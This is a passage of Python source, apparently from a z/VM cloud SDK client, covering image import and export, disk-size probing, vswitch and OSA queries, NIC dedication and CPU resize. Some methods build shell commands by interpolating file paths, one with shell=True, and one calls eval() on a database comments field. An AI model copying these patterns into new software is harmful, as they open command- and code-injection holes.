msg = ("The md5sum after import is not same as source image,"
" the image has been broken")
LOG.error(msg)
raise exception.SDKImageOperationError(rs=4)
# After import to image repository, figure out the image type is
# single disk image or multiple-disk image,if multiple disks image,
# extract it, if it's single image, rename its name to be same as
# specific vdev
# TODO: (nafei) use sub-function to check the image type
image_type = 'rootonly'
if image_type == 'rootonly':
final_image_fpath = '/'.join([target_folder,
CONF.zvm.user_root_vdev])
os.rename(import_image_fpath, final_image_fpath)
elif image_type == 'alldisks':
# For multiple disks image, extract it, after extract, the
# content under image folder is like: 0100, 0101, 0102
# and remove the image file 0100-0101-0102.tgz
pass
# TODO: put multiple disk image into consideration, update the
# disk_size_units and image_size db field
if not self.is_rhcos(image_os_version):
disk_size_units = self._get_disk_size_units(final_image_fpath)
else:
disk_size_units = self._get_disk_size_units_rhcos(
final_image_fpath)
image_size = self._get_image_size(final_image_fpath)
# TODO: update the real_md5sum field to include each disk image
self._ImageDbOperator.image_add_record(image_name,
image_os_version,
real_md5sum,
disk_size_units,
image_size,
image_type,
comments=comments)
LOG.info("Image %s is import successfully" % image_name)
except Exception:
# Cleanup the image from image repository
self._pathutils.clean_temp_folder(target_folder)
raise
def image_export(self, image_name, dest_url, remote_host=None):
"""Export the specific image to remote host or local file system
:param image_name: image name that can be uniquely identify an image
:param dest_path: the location to store exported image, eg.
/opt/images, the image will be stored in folder
/opt/images/
:param remote_host: the server that export image to, the format is
username@IP eg. nova@192.168.99.1, if remote_host is
None, it means the image will be stored in local server
:returns a dictionary that contains the exported image info
{
'image_name': the image_name that exported
'image_path': the image_path after exported
'os_version': the os version of the exported image
'md5sum': the md5sum of the original image
'comments': the comments of the original image
}
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
msg = ("The image %s does not exist in image repository"
% image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=20, img=image_name)
image_type = image_info[0]['type']
# TODO: (nafei) according to image_type, detect image exported path
# For multiple disk image, make the tgz firstly, the specify the
# source_path to be something like: 0100-0101-0102.tgz
if image_type == 'rootonly':
source_path = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
image_info[0]['imageosdistro'],
image_name,
CONF.zvm.user_root_vdev])
else:
pass
self._scheme2backend(urlparse.urlparse(dest_url).scheme).image_export(
source_path, dest_url,
remote_host=remote_host)
# TODO: (nafei) for multiple disks image, update the expect_dict
# to be the tgz's md5sum
export_dict = {'image_name': image_name,
'image_path': dest_url,
'os_version': image_info[0]['imageosdistro'],
'md5sum': image_info[0]['md5sum'],
'comments': image_info[0]['comments']}
LOG.info("Image %s export successfully" % image_name)
return export_dict
def _get_image_disk_size_units(self, image_path):
""" Return a comma separated string to indicate the image disk size
and units for each image disk file under image_path
For single disk image , it looks like: 0100=3338:CYL
For multiple disk image, it looks like:
0100=3338:CYL,0101=4194200:BLK, 0102=4370:CYL"""
pass
def _get_disk_size_units(self, image_path):
command = 'hexdump -n 48 -C %s' % image_path
(rc, output) = zvmutils.execute(command)
LOG.debug("hexdump result is %s" % output)
if rc:
msg = ("Error happened when executing command hexdump with"
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=5)
try:
root_disk_size = int(output[144:156])
disk_units = output[220:223]
root_disk_units = ':'.join([str(root_disk_size), disk_units])
except ValueError:
msg = ("Image file at %s is missing built-in disk size "
"metadata, it was probably not captured by SDK" %
image_path)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=6)
if 'FBA' not in output and 'CKD' not in output:
raise exception.SDKImageOperationError(rs=7)
LOG.debug("The image's root_disk_units is %s" % root_disk_units)
return root_disk_units
def _get_disk_size_units_rhcos(self, image_path):
command = "fdisk -b 4096 -l %s | head -2 | awk '{print $5}'" % (
image_path)
rc = 0
output = ""
try:
# shell should be set True because it is a shell command with
# pipeline, so can not use utils.execute function here
output = subprocess.check_output(command, shell=True,
stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
rc = err.returncode
output = err.output
except Exception as err:
err_msg = ('Command "%s" Error: %s' % (' '.join(command),
str(err)))
raise exception.SDKInternalError(msg=err_msg)
if rc or output.strip('1234567890\n'):
msg = ("Error happened when executing command fdisk with "
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=8)
image_size = output.split()[0]
try:
cyl = (float(image_size)) / 737280
cyl = str(int(math.ceil(cyl)))
except Exception:
msg = ("Failed to convert %s to a number of cylinders."
% image_size)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=14, msg=msg)
disk_units = "CYL"
root_disk_units = ':'.join([str(cyl), disk_units])
LOG.debug("The image's root_disk_units is %s" % root_disk_units)
return root_disk_units
def _get_image_size(self, image_path):
"""Return disk size in bytes"""
command = 'du -b %s' % image_path
(rc, output) = zvmutils.execute(command)
if rc:
msg = ("Error happened when executing command du -b with"
"reason: %s" % output)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=8)
size = output.split()[0]
return size
def _get_image_path_by_name(self, image_name):
try:
target_info = self._ImageDbOperator.image_query_record(image_name)
except exception.SDKObjectNotExistError:
msg = ("The image %s does not exist in image repository"
% image_name)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=20, img=image_name)
# TODO: (nafei) Handle multiple disks image deploy
image_path = '/'.join([CONF.image.sdk_image_repository,
const.IMAGE_TYPE['DEPLOY'],
target_info[0]['imageosdistro'],
image_name])
return image_path
def _scheme2backend(self, scheme):
try:
return {
"file": FilesystemBackend,
"http": HTTPBackend,
# "https": HTTPSBackend
}[scheme]
except KeyError:
msg = ("No backend found for '%s'" % scheme)
LOG.error(msg)
raise exception.SDKImageOperationError(rs=2, schema=scheme)
def _get_md5sum(self, fpath):
"""Calculate the md5sum of the specific image file"""
try:
current_md5 = hashlib.md5()
if isinstance(fpath, six.string_types) and os.path.exists(fpath):
with open(fpath, "rb") as fh:
for chunk in self._read_chunks(fh):
current_md5.update(chunk)
elif (fpath.__class__.__name__ in ["StringIO", "StringO"] or
isinstance(fpath, IOBase)):
for chunk in self._read_chunks(fpath):
current_md5.update(chunk)
else:
return ""
return current_md5.hexdigest()
except Exception:
msg = ("Failed to calculate the image's md5sum")
LOG.error(msg)
raise exception.SDKImageOperationError(rs=3)
def _read_chunks(self, fh):
fh.seek(0)
chunk = fh.read(CHUNKSIZE)
while chunk:
yield chunk
chunk = fh.read(CHUNKSIZE)
else:
fh.seek(0)
def image_delete(self, image_name):
# Delete image file
try:
self._delete_image_file(image_name)
# Delete image record from db
self._ImageDbOperator.image_delete_record(image_name)
except exception.SDKImageOperationError as err:
results = err.results
if ((results['rc'] == 300) and (results['rs'] == 20)):
LOG.warning("Image %s does not exist", image_name)
return
else:
LOG.error("Failed to delete image %s, error: %s" %
(image_name, err.format_message()))
raise
msg = ('Delete image %s successfully' % image_name)
LOG.info(msg)
def _delete_image_file(self, image_name):
image_path = self._get_image_path_by_name(image_name)
self._pathutils.clean_temp_folder(image_path)
def _get_image_last_access_time(self, image_name, raise_exception=True):
"""Get the last access time of the image."""
image_file = os.path.join(self._get_image_path_by_name(image_name),
CONF.zvm.user_root_vdev)
if not os.path.exists(image_file):
if raise_exception:
msg = 'Failed to get time stamp of image:%s' % image_name
LOG.error(msg)
raise exception.SDKImageOperationError(rs=23, img=image_name)
else:
# An invalid timestamp
return -1
atime = os.path.getatime(image_file)
return atime
def image_query(self, image_name=None):
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
# because database maybe None, so return nothing here
return []
# if image_name is not None, means there is only one record
if image_name:
last_access_time = self._get_image_last_access_time(
image_name, raise_exception=False)
image_info[0]['last_access_time'] = last_access_time
else:
for item in image_info:
image_name = item['imagename']
# set raise_exception to false because one failed
# may stop processing all the items in the list
last_access_time = self._get_image_last_access_time(
image_name, raise_exception=False)
item['last_access_time'] = last_access_time
return image_info
def image_get_root_disk_size(self, image_name):
"""Return the root disk units of the specified image
image_name: the unique image name in db
Return the disk units in format like 3339:CYL or 467200:BLK
"""
image_info = self.image_query(image_name)
if not image_info:
raise exception.SDKImageOperationError(rs=20, img=image_name)
disk_size_units = image_info[0]['disk_size_units'].split(':')[0]
return disk_size_units
def image_get_os_distro(self, image_name):
"""
Return the operating system distro of the specified image
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if not image_info:
raise exception.SDKImageOperationError(rs=20, img=image_name)
os_distro = image_info[0]['imageosdistro']
return os_distro
def _get_image_disk_type(self, image_name):
"""
Return image disk type
"""
image_info = self._ImageDbOperator.image_query_record(image_name)
if ((image_info[0]['comments'] is not None) and
(image_info[0]['comments'].__contains__('disk_type'))):
image_disk_type = eval(image_info[0]['comments'])['disk_type']
if image_disk_type == 'DASD':
return 'ECKD'
elif image_disk_type == 'SCSI':
return 'SCSI'
else:
return None
else:
return None
def punch_file(self, userid, fn, fclass):
rd = ("changevm %(uid)s punchfile %(file)s --class %(class)s" %
{'uid': userid, 'file': fn, 'class': fclass})
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
LOG.error("Failed to punch file to userid '%s',"
"error: %s" % (userid, err.format_message()))
raise
finally:
os.remove(fn)
def get_guest_connection_status(self, userid):
'''Get guest vm connection status.'''
rd = ' '.join(('getvm', userid, 'isreachable'))
results = self._request(rd)
if results['rs'] == 1:
return True
else:
return False
def _generate_disk_parmline(self, vdev, fmt, mntdir):
parms = [
'action=' + 'addMdisk',
'vaddr=' + vdev,
'filesys=' + fmt,
'mntdir=' + mntdir
]
parmline = ' '.join(parms)
parmstr = "'" + parmline + "'"
return parmstr
def process_additional_minidisks(self, userid, disk_info):
'''Generate and punch the scripts used to process additional disk into
target vm's reader.
'''
for idx, disk in enumerate(disk_info):
vdev = disk.get('vdev') or self.generate_disk_vdev(
offset = (idx + 1))
fmt = disk.get('format')
mount_dir = disk.get('mntdir') or ''.join(['/mnt/ephemeral',
str(vdev)])
# the mount point of swap partition is swap
if fmt == "swap":
mount_dir = "swap"
disk_parms = self._generate_disk_parmline(vdev, fmt, mount_dir)
func_name = '/var/lib/zvmsdk/setupDisk'
self.aemod_handler(userid, func_name, disk_parms)
# trigger do-script
if self.get_power_state(userid) == 'on':
self.execute_cmd(userid, "/usr/bin/zvmguestconfigure start")
def aemod_handler(self, instance_name, func_name, parms):
rd = ' '.join(['changevm', instance_name, 'aemod', func_name,
'--invparms', parms])
action = parms[0] + instance_name
with zvmutils.log_and_reraise_smt_request_failed(action):
self._request(rd)
def get_user_console_output(self, userid):
# get console into reader
rd = 'getvm %s consoleoutput' % userid
action = 'get console log reader file list for guest vm: %s' % userid
with zvmutils.log_and_reraise_smt_request_failed(action):
resp = self._request(rd)
with zvmutils.expect_invalid_resp_data(resp):
rf_list = resp['response'][0].rpartition(':')[2].strip().split()
# TODO: make sure reader device is online
# via 'cat /sys/bus/ccw/drivers/vmur/0.0.000c/online'
# 'sudo /sbin/cio_ignore -r 000c; sudo /sbin/chccwdev -e 000c'
# 'which udevadm &> /dev/null && udevadm settle || udevsettle'
logs = []
for rf in rf_list:
cmd = 'sudo /usr/sbin/vmur re -t -O %s' % rf
rc, output = zvmutils.execute(cmd)
if rc == 0:
logs.append(output)
return ''.join(logs)
def query_vswitch(self, switch_name):
smt_userid = zvmutils.get_smt_userid()
rd = ' '.join((
"SMAPI %s API Virtual_Network_Vswitch_Query_Extended" %
smt_userid,
"--operands",
'-k switch_name=%s' % switch_name
))
try:
results = self._request(rd)
rd_list = results['response']
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 212) and (err.results['rs'] == 40)):
msg = 'Vswitch %s does not exist' % switch_name
LOG.error(msg)
obj_desc = "Vswitch %s" % switch_name
raise exception.SDKObjectNotExistError(obj_desc=obj_desc,
modID='network')
else:
action = "query vswitch details info"
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
vsw_info = {}
with zvmutils.expect_invalid_resp_data():
# ignore user_vlan_id part and jump to the vswitch basic info
idx_end = len(rd_list)
idx = 0
while((idx < idx_end) and
not rd_list[idx].__contains__('switch_name')):
idx = idx + 1
# The next 21 lines contains the vswitch basic info
# eg, name, type, port_type, vlan_awareness, etc
for i in range(21):
rd = rd_list[idx + i].split(':')
vsw_info[rd[0].strip()] = rd[1].strip()
idx = idx + 21
# Skip the vepa_status
while((idx < idx_end) and
not rd_list[idx].__contains__('real_device_address') and
not rd_list[idx].__contains__('port_num') and
not rd_list[idx].__contains__('adapter_owner')):
idx = idx + 1
def _parse_value(data_list, idx, keyword, offset=1):
value = data_list[idx].rpartition(keyword)[2].strip()
if value == '(NONE)':
value = 'NONE'
return idx + offset, value
def _parse_dev_status(value):
if value in const.DEV_STATUS.keys():
return const.DEV_STATUS[value]
else:
return 'Unknown'
def _parse_dev_err(value):
if value in const.DEV_ERROR.keys():
return const.DEV_ERROR[value]
else:
return 'Unknown'
# Start to analyse the real devices info
vsw_info['real_devices'] = {}
while((idx < idx_end) and
rd_list[idx].__contains__('real_device_address')):
# each rdev has 6 lines' info
idx, rdev_addr = _parse_value(rd_list, idx,
'real_device_address: ')
idx, vdev_addr = _parse_value(rd_list, idx,
'virtual_device_address: ')
idx, controller = _parse_value(rd_list, idx,
'controller_name: ')
idx, port_name = _parse_value(rd_list, idx, 'port_name: ')
idx, dev_status = _parse_value(rd_list, idx,
'device_status: ')
idx, dev_err = _parse_value(rd_list, idx,
'device_error_status ')
vsw_info['real_devices'][rdev_addr] = {'vdev': vdev_addr,
'controller': controller,
'port_name': port_name,
'dev_status':
_parse_dev_status(
dev_status),
'dev_err': _parse_dev_err(
dev_err)
}
# Under some case there would be an error line in the output
# "Error controller_name is NULL!!", skip this line
if ((idx < idx_end) and
rd_list[idx].__contains__(
'Error controller_name is NULL!!')):
idx += 1
# Start to get the authorized userids
vsw_info['authorized_users'] = {}
while((idx < idx_end) and rd_list[idx].__contains__('port_num')):
# each authorized userid has 6 lines' info at least
idx, port_num = _parse_value(rd_list, idx,
'port_num: ')
idx, userid = _parse_value(rd_list, idx,
'grant_userid: ')
idx, prom_mode = _parse_value(rd_list, idx,
'promiscuous_mode: ')
idx, osd_sim = _parse_value(rd_list, idx, 'osd_sim: ')
idx, vlan_count = _parse_value(rd_list, idx,
'vlan_count: ')
vlan_ids = []
for i in range(int(vlan_count)):
idx, id = _parse_value(rd_list, idx,
'user_vlan_id: ')
vlan_ids.append(id)
# For vlan unaware vswitch, the query smcli would
# return vlan_count as 1, here we just set the count to 0
if (vsw_info['vlan_awareness'] == 'UNAWARE'):
vlan_count = 0
vlan_ids = []
vsw_info['authorized_users'][userid] = {
'port_num': port_num,
'prom_mode': prom_mode,
'osd_sim': osd_sim,
'vlan_count': vlan_count,
'vlan_ids': vlan_ids
}
# Start to get the connected adapters info
# OWNER_VDEV would be used as the dict key for each adapter
vsw_info['adapters'] = {}
while((idx < idx_end) and
rd_list[idx].__contains__('adapter_owner')):
# each adapter has four line info: owner, vdev, macaddr, type
idx, owner = _parse_value(rd_list, idx,
'adapter_owner: ')
idx, vdev = _parse_value(rd_list, idx,
'adapter_vdev: ')
idx, mac = _parse_value(rd_list, idx,
'adapter_macaddr: ')
idx, type = _parse_value(rd_list, idx, 'adapter_type: ')
key = owner + '_' + vdev
vsw_info['adapters'][key] = {
'mac': mac,
'type': type
}
# Todo: analyze and add the uplink NIC info and global member info
def _parse_switch_status(value):
if value in const.SWITCH_STATUS.keys():
return const.SWITCH_STATUS[value]
else:
return 'Unknown'
if 'switch_status' in vsw_info.keys():
vsw_info['switch_status'] = _parse_switch_status(
vsw_info['switch_status'])
return vsw_info
def get_nic_info(self, userid=None, nic_id=None, vswitch=None):
nic_info = self._NetDbOperator.switch_select_record(userid=userid,
nic_id=nic_id, vswitch=vswitch)
return nic_info
def is_first_network_config(self, userid):
action = "get guest '%s' to database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
info = self._GuestDbOperator.get_guest_by_userid(userid)
# check net_set
if int(info[3]) == 0:
return True
else:
return False
def update_guestdb_with_net_set(self, userid):
action = "update guest '%s' in database" % userid
with zvmutils.log_and_reraise_sdkbase_error(action):
self._GuestDbOperator.update_guest_by_userid(userid, net_set='1')
def _is_OSA_free(self, OSA_device):
osa_info = self._query_OSA()
if 'OSA' not in osa_info.keys():
return False
elif len(osa_info['OSA']['FREE']) == 0:
return False
else:
dev1 = str(OSA_device).zfill(4).upper()
dev2 = str(str(hex(int(OSA_device, 16) + 1))[2:]).zfill(4).upper()
dev3 = str(str(hex(int(OSA_device, 16) + 2))[2:]).zfill(4).upper()
if ((dev1 in osa_info['OSA']['FREE']) and
(dev2 in osa_info['OSA']['FREE']) and
(dev3 in osa_info['OSA']['FREE'])):
return True
else:
return False
def _query_OSA(self):
smt_userid = zvmutils.get_smt_userid()
rd = "SMAPI %s API Virtual_Network_OSA_Query" % smt_userid
OSA_info = {}
try:
results = self._request(rd)
rd_list = results['response']
except exception.SDKSMTRequestFailed as err:
if ((err.results['rc'] == 4) and (err.results['rs'] == 4)):
msg = 'No OSAs on system'
LOG.info(msg)
return OSA_info
else:
action = "query OSA details info"
msg = "Failed to %s. " % action
msg += "SMT error: %s" % err.format_message()
LOG.error(msg)
raise exception.SDKSMTRequestFailed(err.results, msg)
with zvmutils.expect_invalid_resp_data():
idx_end = len(rd_list)
idx = 0
def _parse_value(data_list, idx, keyword, offset=1):
value = data_list[idx].rpartition(keyword)[2].strip()
return idx + offset, value
# Start to analyse the osa devices info
while((idx < idx_end) and
rd_list[idx].__contains__('OSA Address')):
idx, osa_addr = _parse_value(rd_list, idx,
'OSA Address: ')
idx, osa_status = _parse_value(rd_list, idx,
'OSA Status: ')
idx, osa_type = _parse_value(rd_list, idx,
'OSA Type: ')
if osa_type != 'UNKNOWN':
idx, CHPID_addr = _parse_value(rd_list, idx,
'CHPID Address: ')
idx, Agent_status = _parse_value(rd_list, idx,
'Agent Status: ')
if osa_type not in OSA_info.keys():
OSA_info[osa_type] = {}
OSA_info[osa_type]['FREE'] = []
OSA_info[osa_type]['BOXED'] = []
OSA_info[osa_type]['OFFLINE'] = []
OSA_info[osa_type]['ATTACHED'] = []
if osa_status.__contains__('ATT'):
id = osa_status.split()[1]
item = (id, osa_addr)
OSA_info[osa_type]['ATTACHED'].append(item)
else:
OSA_info[osa_type][osa_status].append(osa_addr)
return OSA_info
def _get_available_vdev(self, userid, vdev=None):
ports_info = self._NetDbOperator.switch_select_table()
vdev_info = []
for p in ports_info:
if p['userid'] == userid.upper():
vdev_info.append(p['interface'])
if len(vdev_info) == 0:
# no nic defined for the guest
if vdev is None:
nic_vdev = CONF.zvm.default_nic_vdev
else:
nic_vdev = vdev
else:
if vdev is None:
used_vdev = max(vdev_info)
nic_vdev = str(hex(int(used_vdev, 16) + 3))[2:]
else:
if self._is_vdev_valid(vdev, vdev_info):
nic_vdev = vdev
else:
errmsg = ("The specified virtual device number %s "
"has already been used." % vdev)
raise exception.SDKConflictError(modID='network', rs=6,
vdev=vdev, userid=userid,
msg=errmsg)
if ((len(nic_vdev) > 4) or
(len(str(hex(int(nic_vdev, 16) + 2))[2:]) > 4)):
errmsg = ("Virtual device number %s is not valid" % nic_vdev)
raise exception.SDKInvalidInputFormat(msg=errmsg)
return nic_vdev
def dedicate_OSA(self, userid, OSA_device, vdev=None, active=False):
nic_vdev = self._get_available_vdev(userid, vdev=vdev)
if not self._is_OSA_free(OSA_device):
errmsg = ("The specified OSA device number %s "
"is not free" % OSA_device)
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
LOG.debug('Nic attributes: vdev is %(vdev)s, '
'dedicated OSA device is %(osa)s',
{'vdev': nic_vdev,
'osa': OSA_device})
self._dedicate_OSA(userid, OSA_device, nic_vdev, active=active)
return nic_vdev
def _dedicate_OSA_inactive_exception(self, error, userid, vdev,
OSA_device):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=15,
osa=OSA_device, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 12)):
obj_desc = "Guest device %s" % vdev
raise exception.SDKConflictError(modID='network', rs=15,
osa=OSA_device, userid=userid,
obj=obj_desc)
elif ((error.results['rc'] == 404) and (error.results['rs'] == 4)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
else:
raise error
def _dedicate_OSA_active_exception(self, error, userid, OSA_device):
if (((error.results['rc'] == 204) and (error.results['rs'] == 4)) or
((error.results['rc'] == 204) and (error.results['rs'] == 8)) or
((error.results['rc'] == 204) and (error.results['rs'] == 16))):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=14,
osa=OSA_device, userid=userid,
msg=errmsg)
else:
raise error
def _dedicate_OSA(self, userid, OSA_device, vdev, active=False):
if active:
self._is_active(userid)
msg = ('Start to dedicate nic device %(vdev)s of guest %(vm)s '
'to OSA device %(osa)s'
% {'vdev': vdev, 'vm': userid, 'osa': OSA_device})
LOG.info(msg)
def_vdev = vdev
att_OSA_device = OSA_device
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Dedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev,
"-r %s" % att_OSA_device))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
LOG.error("Failed to dedicate OSA %s to nic %s for user %s "
"in the guest's user direct, error: %s" %
(att_OSA_device, def_vdev, userid,
err.format_message()))
# TODO revoke the dedicated OSA in user direct
while (int(def_vdev, 16) != int(vdev, 16)):
def_vdev = str(hex(int(def_vdev, 16) - 1))[2:]
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
if ((err2.results['rc'] == 404) and
(err2.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for user"
" %s in the guest's user direct, "
"error: %s" %
(def_vdev, userid,
err2.format_message()))
pass
self._dedicate_OSA_inactive_exception(err, userid, vdev,
OSA_device)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:]
if active:
def_vdev = vdev
att_OSA_device = OSA_device
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Dedicate' %
userid,
"--operands",
"-v %s" % def_vdev,
"-r %s" % att_OSA_device))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
LOG.error("Failed to dedicate OSA %s to nic %s for user "
"%s on the active guest system, error: %s" %
(att_OSA_device, def_vdev, userid,
err.format_message()))
# TODO revoke the dedicated OSA in user direct and active
detach_vdev = vdev
for j in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % detach_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err2:
if ((err2.results['rc'] == 404) and
(err2.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for "
"user %s in the guest's user "
"direct, error: %s" %
(def_vdev, userid,
err2.format_message()))
pass
detach_vdev = str(hex(int(detach_vdev, 16) + 1))[2:]
while (int(def_vdev, 16) != int(vdev, 16)):
def_vdev = str(hex(int(def_vdev, 16) - 1))[2:]
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err3:
if ((err3.results['rc'] == 204) and
(err3.results['rs'] == 8)):
pass
else:
LOG.error("Failed to Undedicate nic %s for "
"user %s on the active guest "
"system, error: %s" %
(def_vdev, userid,
err3.format_message()))
pass
self._dedicate_OSA_active_exception(err, userid,
OSA_device)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
att_OSA_device = str(hex(int(att_OSA_device, 16) + 1))[2:]
OSA_desc = 'OSA=%s' % OSA_device
self._NetDbOperator.switch_add_record(userid, vdev, comments=OSA_desc)
msg = ('Dedicate nic device %(vdev)s of guest %(vm)s '
'to OSA device %(osa)s successfully'
% {'vdev': vdev, 'vm': userid, 'osa': OSA_device})
LOG.info(msg)
def _undedicate_nic_active_exception(self, error, userid, vdev):
if ((error.results['rc'] == 204) and (error.results['rs'] == 44)):
errmsg = error.format_message()
raise exception.SDKConflictError(modID='network', rs=16,
userid=userid, vdev=vdev,
msg=errmsg)
else:
raise error
def _undedicate_nic_inactive_exception(self, error, userid, vdev):
if ((error.results['rc'] == 400) and (error.results['rs'] == 12)):
obj_desc = "Guest %s" % userid
raise exception.SDKConflictError(modID='network', rs=17,
userid=userid, vdev=vdev,
obj=obj_desc)
else:
raise error
def _undedicate_nic(self, userid, vdev, active=False,
del_active_only=False):
if active:
self._is_active(userid)
msg = ('Start to undedicate nic device %(vdev)s of guest %(vm)s'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
if not del_active_only:
def_vdev = vdev
for i in range(3):
requestData = ' '.join((
'SMAPI %s API Image_Device_Undedicate_DM' %
userid,
"--operands",
"-v %s" % def_vdev))
try:
self._request(requestData)
except (exception.SDKSMTRequestFailed,
exception.SDKInternalError) as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 404) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist in "
"the guest's user direct", vdev)
else:
LOG.error("Failed to undedicate nic %s for %s in "
"the guest's user direct, error: %s" %
(vdev, userid, emsg))
self._undedicate_nic_inactive_exception(err, userid, vdev)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
self._NetDbOperator.switch_delete_record_for_nic(userid, vdev)
if active:
def_vdev = vdev
for i in range(3):
rd = ' '.join((
"SMAPI %s API Image_Device_Undedicate" %
userid,
"--operands",
'-v %s' % def_vdev))
try:
self._request(rd)
except exception.SDKSMTRequestFailed as err:
results = err.results
emsg = err.format_message()
if ((results['rc'] == 204) and
(results['rs'] == 8)):
LOG.warning("Virtual device %s does not exist on "
"the active guest system", vdev)
else:
LOG.error("Failed to undedicate nic %s for %s on "
"the active guest system, error: %s" %
(vdev, userid, emsg))
self._undedicate_nic_active_exception(err, userid,
vdev)
def_vdev = str(hex(int(def_vdev, 16) + 1))[2:]
msg = ('Undedicate nic device %(vdev)s of guest %(vm)s successfully'
% {'vdev': vdev, 'vm': userid})
LOG.info(msg)
def _request_with_error_ignored(self, rd):
"""Send smt request, log and ignore any errors."""
try:
return self._request(rd)
except Exception as err:
# log as warning and ignore namelist operation failures
LOG.warning(six.text_type(err))
def namelist_add(self, namelist, userid):
rd = ''.join(("SMAPI %s API Name_List_Add " % namelist,
"--operands -n %s" % userid))
self._request_with_error_ignored(rd)
def namelist_remove(self, namelist, userid):
rd = ''.join(("SMAPI %s API Name_List_Remove " % namelist,
"--operands -n %s" % userid))
self._request_with_error_ignored(rd)
def namelist_query(self, namelist):
rd = "SMAPI %s API Name_List_Query" % namelist
resp = self._request_with_error_ignored(rd)
if resp is not None:
return resp['response']
else:
return []
def namelist_destroy(self, namelist):
rd = "SMAPI %s API Name_List_Destroy" % namelist
self._request_with_error_ignored(rd)
def _get_defined_cpu_addrs(self, userid):
user_direct = self.get_user_direct(userid)
defined_addrs = []
max_cpus = 0
for ent in user_direct:
if ent.startswith("CPU"):
cpu_addr = ent.split()[1].strip().upper()
defined_addrs.append(cpu_addr)
if ent.startswith("MACHINE ESA"):
max_cpus = int(ent.split()[2].strip())
return (max_cpus, defined_addrs)
def _get_available_cpu_addrs(self, used_addrs, max_cpus):
# Get available CPU addresses that are not defined in user entry
used_set = set(used_addrs)
available_addrs = set([hex(i)[2:].rjust(2, '0').upper()
for i in range(0, max_cpus)])
available_addrs.difference_update(used_set)
return list(available_addrs)
def _get_active_cpu_addrs(self, userid):
# Get the active cpu addrs in two-digit hex string in upper case
# Sample output for 'lscpu --parse=ADDRESS':
# # The following is the parsable format, which can be fed to other
# # programs. Each different item in every column has an unique ID
# # starting from zero.
# # Address
# 0
# 1
active_addrs = []
active_cpus = self.execute_cmd(userid, "lscpu --parse=ADDRESS")
for c in active_cpus:
# Skip the comment lines at beginning
if c.startswith("# "):
continue
addr = hex(int(c.strip()))[2:].rjust(2, '0').upper()
active_addrs.append(addr)
return active_addrs
def resize_cpus(self, userid, count):
# Check defined cpus in user entry. If greater than requested, then
# delete cpus. Otherwise, add new cpus.
# Return value: for revert usage, a tuple of
# action: The action taken for this resize, possible values:
# 0: no action, 1: add cpu, 2: delete cpu
# cpu_addrs: list of influenced cpu addrs
action = 0
updated_addrs = []
(max_cpus, defined_addrs) = self._get_defined_cpu_addrs(userid)
defined_count = len(defined_addrs)
# Check maximum cpu count defined
if max_cpus == 0:
LOG.error("Resize for guest '%s' cann't be done. The maximum "
"number of cpus is not defined in user directory." %
userid)
raise exception.SDKConflictError(modID='guest', rs=3,
userid=userid)
# Check requested count is less than the maximum cpus
if count > max_cpus:
LOG.error("Resize for guest '%s' cann't be done. The "
"requested number of cpus: '%i' exceeds the maximum "
"number of cpus allowed: '%i'." %
(userid, count, max_cpus))
raise exception.SDKConflictError(modID='guest', rs=4,
userid=userid,
req=count, max=max_cpus)
# Check count and take action
if defined_count == count:
LOG.info("The number of current defined CPUs in user '%s' equals "
"to requested count: %i, no action for static resize"
"needed." % (userid, count))
return (action, updated_addrs, max_cpus)
elif defined_count < count:
action = 1
# add more CPUs
available_addrs = self._get_available_cpu_addrs(defined_addrs,
max_cpus)
# sort the list and get the first few addrs to use
available_addrs.sort()
# Define new cpus in user directory
rd = ''.join(("SMAPI %s API Image_Definition_Update_DM " % userid,
"--operands"))
